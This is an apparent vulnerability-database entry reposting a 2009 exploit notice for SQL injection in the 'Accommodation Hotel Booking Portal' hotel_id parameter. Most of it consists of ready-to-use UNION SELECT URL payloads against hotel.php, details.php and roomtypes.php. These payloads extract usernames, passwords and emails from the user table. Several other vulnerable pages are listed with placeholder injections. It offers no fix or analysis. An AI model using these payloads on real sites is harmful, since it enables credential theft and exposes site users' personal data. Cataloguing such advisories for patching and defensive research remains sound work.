Accommodation Hotel Booking Portal (hotel_id) SQL Injection Vuln

2009-09-10T00:00:00
ID SSV:14534
Type seebug
Reporter Root
Modified 2009-09-10T00:00:00

Description

No description provided by source.

                                        
                                            
                                                ###############################################################
#################### Viva IslaM Viva IslaM ####################
##
## Remote SQL Injection Vulnerability ( hotel.php hotel_id )
##
## Accommodation Hotel Booking Portal
##
## http://www.tourismscripts.com
##
###############################################################
###############################################################
##
## AuTh0r : Mr.SQL
##
## H0ME   : WwW.55a.NeT
##
## Email  : SQL@Hotmail.iT
##
########################
########################
##
## -[[: ExploiteS :]]-
##
## www.TraGeT.CoM/hotel.php?hotel_id=1'+UNION+SELECT+0,0,0,0,0,CONCAT_WS(0x3a3a3a3a3a,user_name,password,email),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+user/*
## www.TraGeT.CoM/details.php?hotel_id=1'+UNION+SELECT+0,0,0,0,0,CONCAT_WS(0x3a3a,user_name,password,email),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+user/*
## www.TraGeT.CoM/roomtypes.php?hotel_id=1'+UNION+SELECT+0,0,CONCAT_WS(0x3a3a3a3a3a,user_name,password,email),0,0,0,0,0,0,0,0+FROM+user/*
## www.TraGeT.CoM/photos.php?hotel_id=1' << SQL >>
## www.TraGeT.CoM/map.php?hotel_id=1' << SQL >>
## www.TraGeT.CoM/weather.php?hotel_id=1' << SQL >>
## www.TraGeT.CoM/reviews.php?hotel_id=1' << SQL >>
## www.TraGeT.CoM/book.php?hotel_id=1' << SQL >>
##
########################
########################

# sebug.net